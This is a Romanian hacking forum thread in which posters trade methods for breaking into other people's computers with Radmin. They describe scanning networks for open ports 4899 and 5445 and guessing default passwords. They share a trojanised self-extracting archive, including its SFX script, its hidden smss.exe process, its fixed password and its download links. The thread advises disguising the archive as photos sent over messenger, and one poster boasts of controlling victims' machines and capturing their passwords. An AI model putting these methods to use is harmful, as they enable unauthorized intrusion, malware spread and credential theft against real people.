Jump to content
edyshmen

Radmin

Recommended Posts

Pt a te putea connecta iti trebuie si un scanner de ip ..iti recomand Angry IP Scanner .. .! Scanezi ip si pe portul 4899 parca... daca ma instel sa zica cineva.. pe ce port ! Apoi daca ai gasit incerci sa te connectezi cu radmin...asta daca ip respectiv nu are parola.. ! daca are incearca pass 12345678 asta si-o mai pun uni si iarasi incearca asea : password ..miam inceput viata de hacker cu radmin.. ca sa fiu sincer :) si am gasit multi prosti cu parolele astia.. ! daca nu merge treci la urmatorul ip ;) .. ! End.. :)

Bafta :P

Link to comment
Share on other sites

In mod normal asta nu e radmin(care nu e troian,btw),ci este ghostradmin care e troian si il detecteaza toti AV.

Versiunea asta e f bine facuta si nu e detectabila decit in proportie de 10% ?,dar am observat un bug cam nasol:la primul restart nu se mai deschide serverul de radmin,deci daca il trimiteti cuiva ar fi bine sa profitati de momentul cind il deschide ca dupa aceea nu cred ca mai reusiti sa il convingeti sa porneasca broscutsa.

Merge pe portul 4899 si nu are parola.

Ai putea PsYKid sa mai binduiesti serverul la citeva aplicatii sau poze si sa le postezi undeva sa le putem lua si noi.

Felicitari pentru o treaba bine facuta!

Link to comment
Share on other sites

am si eu un programel d-asta. are icoana de poza si e o arhiva self extract care executa urmatoarele:

;The comment below contains SFX script commands

Path=%systemroot%\PIF

SavePath

Setup=cmd.vbe

Silent=1

Overwrite=2

deschide portul 5445 daca este executat si porneste un proces smss.exe care nu merge inchis din task manager. porneste odata cu windows-ul. se intra cu radmin viewer pe ip-ul victimei. parola este: xplicit

ivano . ch / caracal . exe

nu pot sa pun link pentru ca nu am 10 postari pe forum :P scrieti voi vara spatii si ii puneti apoi ce nume vreti.

cheers

Link to comment
Share on other sites

nu apare in msconfig. cu Process Explorer inchizi smss.exe (o sa-ti dai tu seama care e mai...dubios), stergi folderul C:\windows\Pif (mi se pare ca e hidden) si mai trebuie sters ceva din registrii:

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\

am pus iar http://web.clicknet.ro/caracal/b.exe

i-am pus icoana de arhiva. poti sa-l trimiti si sa spui ca sunt poze arhivate ca self extract :P numai ca pe messenger apare icoana d-aia de program :)

cheers

Link to comment
Share on other sites

nu apare in msconfig. cu Process Explorer inchizi smss.exe (o sa-ti dai tu seama care e mai...dubios), stergi folderul C:\windows\Pif (mi se pare ca e hidden) si mai trebuie sters ceva din registrii:

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\

am pus iar http://web.clicknet.ro/caracal/b.exe

i-am pus icoana de arhiva. poti sa-l trimiti si sa spui ca sunt poze arhivate ca self extract :P numai ca pe messenger apare icoana d-aia de program :)

cheers

Nu prea mai primeste lumea .exe-uri pe messenger...dar e bun pt noobi. Si cred ca intru si eu la noobi ca nu stiu cum sa scap de el :shock: din process explorer nu poate fi inchis, in registrii nu imi apare nici un radmin, iar executabilul creat (si rulat :-|) nu pot sa il sterg de pe desktop. Any advice would be apreciated :D

Link to comment
Share on other sites

eu am scanat retelele din targoviste pe portul 5445. am gasit o gramada! am lista de radmin plina :) si-mi bat joc de ei...daca dai full control, e pe messenger persoana aia, il deconectezi cu CTRL+D, apoi cand vrea sa intre, ii stergi parola sa fie nevoit s-o bage iar. cand vrea s-o scrie, apesi SHIFT+TAB si se muta cursorul la id :) asa ii vezi parola...sunt multi prosti...si daca stii sa-i...imbarligi, le trimiti si .exe pe messenger :P

valentine, vezi ce process explorer e un program de la sysinternals. www.sysinternals.com

in el o sa-ti arate un proces dubios smss.exe. il inchizi si gata :)

cheers

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...